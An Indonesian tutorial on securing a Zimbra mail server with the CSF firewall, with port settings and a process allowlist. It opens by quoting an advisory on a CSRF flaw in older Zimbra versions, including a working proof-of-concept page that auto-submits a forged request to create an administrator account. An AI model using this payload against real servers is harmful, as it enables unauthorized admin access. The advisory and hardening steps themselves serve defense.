Sebelum kami membuat artikel Mengamankan Zimbra menggunakan CSF Firewall ini. kami telah menemui bugs Zimbra untuk versi 8.6.x kebawah seperti gambar dibawah ini
Vulnerability
Every forms in the Administration part of Zimbra are vulnerable to CSRF because of the lack of a CSRF token identifying a valid session. As a consequence, requests can be forged and played arbitrarily.
Access Vector: remote
Security Risk: low
Vulnerability: CWE-352
CVSS Base score: 5.8
Proof of Concept
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 |
<html> <body> <form enctype="text/plain" id="trololo" action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest" method="POST"> <input name='<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns="" id="1337"/><format xmlns="" type="js"/></context></soap:Header><soap:Body><CreateAccountRequest xmlns="urn:zimbraAdmin"><name xmlns="">[email protected]</name><password xmlns="">test1234</password><a xmlns="" n="zimbraAccountStatus">active</a><a xmlns="" n="displayName">ItWorks</a><a xmlns="" n' value='"sn">itworks</a><a xmlns="" n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/> </form> <script> document.forms[].submit(); </script> </body> </html> |
Solution
Upgrade to version 8.7
Affected versions
All versions previous to 8.7
Bagaimana Mengamankan Zimbra menggunakan CSF Firewall
hal diatas adalah bugs yang dapat menyebabkan server anda terkena SPAM dan mewajibkan kita untuk UPGRADE mail server zimbra anda ke versi teranyar.
berlanjut ke judul artikel Mengamankan Zimbra menggunakan CSF Firewall, CSF adalah salah satu firewall opensource terbaik yang banyak digunakan di sebagian besar penyedia hosting. aplikasi ini sering di install cPanel, Directadmin dan control panel lainnya. aplikasi ini juga merupakan salah satu firewall terbaik untuk di install pada mail server Zimbra. Dokumentasi ini akan membantu Anda mengkonfigurasi CSF firewall pada server Zimbra Standalone.
Sebelum memulai instalasi, Anda mungkin perlu membaca dokumentasi yang tersedia di http://wiki.zimbra.com/wiki/Ports, hal ini akan membantu Anda memahami secara rinci port mana yang diperlukan untuk mengakses server Zimbra.
Instalasi CSF :
Anda dapat mendownload CSF pada url http://configserver.com/cp/csf.html dan untuk cara instalasinya telah kami jabarkan pada artikel dibawah ini:
jika anda telah selesai menginstall CSF, silahkan edit atau tambahkan pada baris ini
|
1 2 |
TCP_IN = "22,25,53,80,110,143,443,465,587,993,995,7071" TCP_OUT = "22,25,53,80,110,113,443,465,587,993,995,7071" |
Sekarang Anda perlu membuka file /etc/csf/csf.pignore untuk meng-allow paket zimbra agar tidak disangka compromised (file yang dicurigai) oleh CSF
|
1 2 3 4 5 6 7 8 9 10 11 12 13 |
exe:/opt/zimbra/amavisd/sbin/amavisd exe:/opt/zimbra/clamav/bin/freshclam exe:/opt/zimbra/clamav/sbin/clamd exe:/opt/zimbra/cyrus-sasl/sbin/saslauthd exe:/opt/zimbra/httpd-2.4.3/bin/httpd exe:/opt/zimbra/httpd/bin/rotatelogs exe:/opt/zimbra/java/bin/java exe:/opt/zimbra/libexec/logswatch exe:/opt/zimbra/libexec/zmmailboxdmgr exe:/opt/zimbra/mysql/bin/mysqld exe:/opt/zimbra/opendkim/sbin/opendkim exe:/opt/zimbra/openldap/sbin/slapd exe:/opt/zimbra/postfix/libexec/master |
Setelah itu restart CSF anda dengan menggunakan perintah
|
1 |
csf -r |
Demikianlah artikel ini kami buat. untuk ke depannya kami akan berbagi mengenai instalasi fail2ban pada Zimbra Mail Server
